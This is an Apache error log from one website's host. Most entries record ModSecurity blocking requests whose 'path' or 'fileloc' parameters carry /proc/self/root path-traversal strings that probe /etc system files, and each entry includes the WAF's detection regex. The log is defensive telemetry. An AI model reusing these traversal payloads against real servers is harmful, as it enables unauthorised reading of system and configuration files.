[Wed Mar 18 10:50:14.235592 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:50794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtlkzinOy1jxa1j4cWdQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 10:50:15.679209 2026] [:error] [pid 30077:tid 140411582465792] [client 216.73.216.191:7461] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtl_u8EFLIOrSqIpsEzQAAAlM"]
[Wed Mar 18 10:50:28.419004 2026] [:error] [pid 15051:tid 140411540502272] [client 216.73.216.191:50383] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtpCmAPhZkrhU8w4lt5QAAAJg"]
[Wed Mar 18 10:50:30.510977 2026] [:error] [pid 15826:tid 140411599251200] [client 216.73.216.191:8301] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtpuoXxyEfFpUF8f9uiAAAAVE"]
[Wed Mar 18 10:50:47.619420 2026] [:error] [pid 30077:tid 140411590858496] [client 216.73.216.191:34176] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtt_u8EFLIOrSqIpsE9gAAAlI"]
[Wed Mar 18 10:50:52.935148 2026] [:error] [pid 15051:tid 140411649607424] [client 216.73.216.191:4776] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtvCmAPhZkrhU8w4luQwAAAIs"]
[Wed Mar 18 10:50:58.075404 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.241.31:48476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtwimAPhZkrhU8w4luTgAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:51:01.835375 2026] [:error] [pid 29882:tid 140411733534464] [client 74.7.241.31:48932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtw0zinOy1jxa1j4cWlAAAAQE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:51:06.681710 2026] [:error] [pid 19507:tid 140411624429312] [client 216.73.216.191:34836] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtydY0UrI5A3LftIypzAAAAY4"]
[Wed Mar 18 10:51:14.628954 2026] [:error] [pid 26799:tid 140411599251200] [client 216.73.216.191:51312] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt0da6ubjKNq_cu4abXQAAA1E"]
[Wed Mar 18 10:51:22.330047 2026] [:error] [pid 31803:tid 140411683178240] [client 216.73.216.191:53549] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt2uyqAr6etmhZHNrBuAAAAEc"]
[Wed Mar 18 10:51:24.092776 2026] [:error] [pid 30077:tid 140411557287680] [client 216.73.216.191:53949] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt2_u8EFLIOrSqIpsFMAAAAlY"]
[Wed Mar 18 10:51:26.193841 2026] [mime_magic:error] [pid 11816:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:40737] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:51:26.443168 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:33903] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt3uoXxyEfFpUF8f9urAAAAUw"]
[Wed Mar 18 10:51:26.526787 2026] [:error] [pid 31803:tid 140411574073088] [client 216.73.216.191:53194] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt3uyqAr6etmhZHNrBvAAAAFQ"]
[Wed Mar 18 10:51:32.309424 2026] [:error] [pid 11816:tid 140411599251200] [client 216.73.216.191:1836] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt5Ow_le52K8_3pV3hQgAAAhE"]
[Wed Mar 18 10:51:37.315197 2026] [:error] [pid 19507:tid 140411741927168] [client 216.73.216.191:7884] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt6dY0UrI5A3LftIyqGwAAAYA"]
[Wed Mar 18 10:51:46.670854 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:38966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt8vu8EFLIOrSqIpsFaAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:51:49.216185 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:34820] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt9Na6ubjKNq_cu4abgAAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:51:51.591173 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:49756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt99a6ubjKNq_cu4abiAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:51:52.867305 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:49766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt-NY0UrI5A3LftIyqPAAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:51:56.429698 2026] [:error] [pid 15051:tid 140411632822016] [client 216.73.216.191:31436] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt-SmAPhZkrhU8w4lutAAAAI0"]
[Wed Mar 18 10:51:57.925235 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:49774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqt_AkwaGbbGflqUZARywAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:52:00.001795 2026] [mime_magic:error] [pid 15051:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:29398] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:52:00.190200 2026] [mime_magic:error] [pid 31803:tid 140411590858496] (70014)End of file found: [client 74.7.243.128:33650] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/bin
[Wed Mar 18 10:52:00.803713 2026] [:error] [pid 30077:tid 140411582465792] [client 216.73.216.191:19219] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquAPu8EFLIOrSqIpsFfwAAAlM"]
[Wed Mar 18 10:52:04.933773 2026] [mime_magic:error] [pid 26799:tid 140411616036608] (70014)End of file found: [client 57.141.18.49:45682] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:52:06.307048 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:49322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abquBvu8EFLIOrSqIpsFhwAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
